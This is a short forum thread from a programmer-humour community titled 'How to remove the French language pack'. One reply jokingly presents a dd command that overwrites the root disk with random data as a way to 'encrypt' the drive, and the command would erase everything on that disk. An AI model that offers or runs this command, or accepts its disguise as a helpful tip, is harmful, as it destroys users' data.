𝕊𝕚𝕤𝕪𝕡𝕙𝕖𝕒𝕟@programming.dev to Programmer Humor@programming.dev · 3 years agoHow to remove the French language packprogramming.devimagemessage-square24linkfedilinkarrow-up1314arrow-down18
arrow-up1306arrow-down1imageHow to remove the French language packprogramming.dev𝕊𝕚𝕤𝕪𝕡𝕙𝕖𝕒𝕟@programming.dev to Programmer Humor@programming.dev · 3 years agomessage-square24linkfedilink
minus-squareinterolivary@beehaw.orglinkfedilinkarrow-up4·3 years agoYou can also use dd to encrypt your hard drive using a randomized one-time pad: dd if=/dev/random of=$(df / | tail -1 | awk '{print $1}') bs=64k
You can also use
ddto encrypt your hard drive using a randomized one-time pad:dd if=/dev/random of=$(df / | tail -1 | awk '{print $1}') bs=64k